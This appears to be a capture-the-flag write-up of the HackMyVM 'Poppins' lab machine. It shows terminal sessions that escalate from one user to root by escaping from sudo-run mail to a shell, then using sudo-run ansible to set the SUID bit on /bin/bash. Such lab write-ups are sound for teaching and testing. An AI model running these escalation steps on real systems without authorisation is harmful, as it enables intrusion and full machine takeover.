drwxr-xr-x 2 jane jane 4096 Aug 29 11:45 .
drwxr-xr-x 6 root root 4096 Aug 29 06:13 ..
lrwxrwxrwx 1 root root 9 Aug 29 09:59 .bash_history -> /dev/null
-rw-r--r-- 1 jane jane 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 jane jane 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 jane jane 807 Apr 18 2019 .profile
michael@Poppins:/home/jane$ cd ..
michael@Poppins:/home$ sudo -l
[sudo] password for michael:
Matching Defaults entries for michael on Poppins:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on Poppins:
(winifred) PASSWD: /usr/bin/mail *

So michael can run /usr/bin/mail with arbitrary arguments as winifred. The entry is PASSWD, not NOPASSWD, so sudo asks for michael's own password, which we already have.

The GTFOBins recipe for mail does not work against this version: the banner "Mail version 8.1.2 01/15/2001" is Debian's BSD mailx, which lacks the --exec option the GTFOBins entry relies on.

The fallback is to put a message into winifred's mailbox first, then open the mailbox interactively and escape to a shell from there.

mail has an interactive command mode. At its "&" prompt, a line beginning with "!" is handed to the shell, so "!/bin/bash" spawns a shell as the user running mail, here winifred under sudo. mail only enters this mode when the mailbox is non-empty (otherwise it prints "No mail for winifred" and exits), which is why a throwaway message is sent to winifred first.

michael@Poppins:/home$ sudo -u winifred /usr/bin/mail -s "test" winifred</dev/null
Null message body; hope that's ok
michael@Poppins:/home$ sudo -u winifred /usr/bin/mail
Mail version 8.1.2 01/15/2001. Type ? for help.
"/var/mail/winifred": 1 message 1 new
>N 1 winifred@poppins Wed Feb 04 02:50 18/558 test
& !/bin/bash
winifred@Poppins:/home$ ls
bert jane michael winifred
winifred@Poppins:~$ sudo -l
Matching Defaults entries for winifred on Poppins:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User winifred may run the following commands on Poppins:
(ALL) NOPASSWD: /usr/bin/ansible *

I had just used ansible while setting up GOAD; it can start a shell and run commands.

Ansible exists to manage and control nodes, and its core modules (command, shell, raw) execute system commands or shell scripts on the target. Run under sudo, an ad-hoc command against the implicit localhost executes as root, so any command runs with root privileges.

Setting the SUID bit on /bin/bash is enough. The inner sudo in the command below is redundant, since the ansible process already runs as root under sudo (that is what the "Consider using become" warning is about), and ls -l rather than plain ls would be needed to actually see the bit; bash -p then keeps the root effective UID.

winifred@Poppins:~$ sudo /usr/bin/ansible localhost -m shell -a 'sudo chmod u+s /bin/bash'
[WARNING]: No inventory was parsed, only implicit localhost is available
[WARNING]: Consider using 'become', 'become_method', and 'become_user' rather than running sudo
localhost | CHANGED | rc=0 >>

winifred@Poppins:~$ ls /bin/bash
/bin/bash
winifred@Poppins:~$ bash -p
bash-5.0# id
uid=1003(winifred) gid=1003(winifred) euid=0(root) groups=1003(winifred)


HackMyVM-Poppins, by Skyarrow, posted February 4, 2026: http://example.com/2026/02/04/HackMyVM-Poppins/